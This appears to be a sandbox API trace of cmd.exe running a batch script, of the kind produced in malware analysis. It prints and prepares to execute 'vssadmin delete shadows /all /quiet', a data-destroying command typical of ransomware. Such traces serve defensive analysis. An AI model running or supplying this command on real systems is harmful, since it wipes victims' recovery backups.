	[0137.575] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.575] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1
	[0137.575] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.575] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.575] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.575] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1
	[0137.575] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.575] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.575] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.575] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1
	[0137.575] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.575] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.575] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.575] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1
	[0137.575] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.575] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.575] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.575] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1
	[0137.575] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.575] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.575] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.576] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1
	[0137.576] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.576] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.576] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.576] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1
	[0137.576] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.576] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.576] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.576] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1
	[0137.576] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.576] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.576] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.576] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1
	[0137.576] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.576] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.576] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.576] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1
	[0137.576] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.576] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.576] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.576] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1
	[0137.576] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.576] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.576] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.576] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0137.576] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.576] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.577] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.577] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1
	[0137.577] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.577] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.577] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.577] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1
	[0137.577] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.577] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.577] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.577] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1
	[0137.577] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.577] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.577] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.577] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1
	[0137.577] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.577] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.577] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.577] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
	[0137.577] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.577] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.577] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.577] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
	[0137.577] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.577] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.577] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.577] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1
	[0137.577] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.577] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.578] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.578] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1
	[0137.578] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.578] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.578] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.578] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1
	[0137.578] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.578] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.578] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.578] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1
	[0137.578] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.578] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.578] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.578] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1
	[0137.578] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.578] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.578] ReadFile (in: hFile=0xec, lpBuffer=0x4a44c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x15f638, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesRead=0x15f638*=0x1, lpOverlapped=0x0) returned 1
	[0137.578] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a44c320, cbMultiByte=1, lpWideCharStr=0x4a44e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
	[0137.578] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.578] GetFileType (hFile=0xec) returned 0x3
	[0137.578] _get_osfhandle (_FileHandle=0) returned 0xec
	[0137.578] SetFilePointer (in: hFile=0xec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0137.578] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.578] GetFileType (hFile=0xf8) returned 0x3
	[0137.578] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0137.578] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37
	[0137.579] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x15f618, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f618*=0x24, lpOverlapped=0x0) returned 1
	[0137.579] GetProcessHeap () returned 0x1f0000
	[0137.579] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4012) returned 0x211010
	[0137.579] GetProcessHeap () returned 0x1f0000
	[0137.579] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x211010 | out: hHeap=0x1f0000) returned 1
	[0137.579] GetProcessHeap () returned 0x1f0000
	[0137.579] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb0) returned 0x209840
	[0137.579] GetProcessHeap () returned 0x1f0000
	[0137.579] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x22) returned 0x204630
	[0137.580] GetProcessHeap () returned 0x1f0000
	[0137.580] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x48) returned 0x210090
	[0137.580] GetConsoleOutputCP () returned 0x4e3
	[0137.580] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a44bfe0 | out: lpCPInfo=0x4a44bfe0) returned 1
	[0137.580] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0137.580] GetConsoleTitleW (in: lpConsoleTitle=0x15f5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0137.580] GetProcessHeap () returned 0x1f0000
	[0137.580] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x218) returned 0x20aae0
	[0137.580] GetProcessHeap () returned 0x1f0000
	[0137.580] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x5a) returned 0x209a50
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x420) returned 0x20b9a0
	[0137.581] SetErrorMode (uMode=0x0) returned 0x0
	[0137.581] SetErrorMode (uMode=0x1) returned 0x0
	[0137.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x20b9b0, lpFilePart=0x15ee60 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x15ee60*="system32") returned 0x13
	[0137.581] SetErrorMode (uMode=0x0) returned 0x1
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x20b9a0, Size=0x4a) returned 0x20b9a0
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x20b9a0) returned 0x4a
	[0137.581] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0137.581] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x104) returned 0x205bb0
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x1f8) returned 0x20ba00
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x20ba00, Size=0x106) returned 0x20ba00
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x20ba00) returned 0x106
	[0137.581] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xe8) returned 0x209c60
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x209c60, Size=0x7e) returned 0x209c60
	[0137.581] GetProcessHeap () returned 0x1f0000
	[0137.581] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x209c60) returned 0x7e
	[0137.581] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0137.581] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x15ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x15ebd0) returned 0x205cc0
	[0137.582] FindClose (in: hFindFile=0x205cc0 | out: hFindFile=0x205cc0) returned 1
	[0137.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x15ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x15ebd0) returned 0xffffffffffffffff
	[0137.582] GetLastError () returned 0x2
	[0137.582] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x15ebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x15ebd0) returned 0x211040
	[0137.582] FindClose (in: hFindFile=0x211040 | out: hFindFile=0x211040) returned 1
	[0137.582] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0137.582] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0137.582] GetConsoleTitleW (in: lpConsoleTitle=0x15f120, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0137.582] GetProcessHeap () returned 0x1f0000
	[0137.582] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x21c) returned 0x20bb20
	[0137.582] GetConsoleTitleW (in: lpConsoleTitle=0x20bb30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0137.583] GetProcessHeap () returned 0x1f0000
	[0137.583] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x20bb20, Size=0xa2) returned 0x20bb20
	[0137.583] GetProcessHeap () returned 0x1f0000
	[0137.583] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x20bb20) returned 0xa2
	[0137.583] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - vssadmin  delete shadows /all /quiet") returned 1
	[0137.583] GetProcessHeap () returned 0x1f0000
	[0137.583] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20bb20 | out: hHeap=0x1f0000) returned 1
	[0137.583] InitializeProcThreadAttributeList (in: lpAttributeList=0x15eed8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x15ee98 | out: lpAttributeList=0x15eed8, lpSize=0x15ee98) returned 1
	[0137.584] UpdateProcThreadAttribute (in: lpAttributeList=0x15eed8, dwFlags=0x0, Attribute=0x60001, lpValue=0x15ee88, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x15eed8, lpPreviousValue=0x0) returned 1
	[0137.584] GetStartupInfoW (in: lpStartupInfo=0x15eff0 | out: lpStartupInfo=0x15eff0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xec, hStdOutput=0xf8, hStdError=0xf8)) 
	[0137.584] GetProcessHeap () returned 0x1f0000
	[0137.584] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x20) returned 0x204660
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0137.584] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
